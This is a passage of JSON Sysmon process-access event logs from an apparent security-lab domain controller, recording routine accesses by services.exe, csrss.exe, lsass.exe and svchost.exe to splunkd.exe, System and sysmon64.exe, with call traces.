{E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"2920","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.943\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3696\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+70fae|C:\\Windows\\system32\\lsass.exe+3907|C:\\Windows\\SYSTEM32\\ntdll.dll+80a84|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.943","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3696","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+70fae|C:\\Windows\\system32\\lsass.exe+3907|C:\\Windows\\SYSTEM32\\ntdll.dll+80a84|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
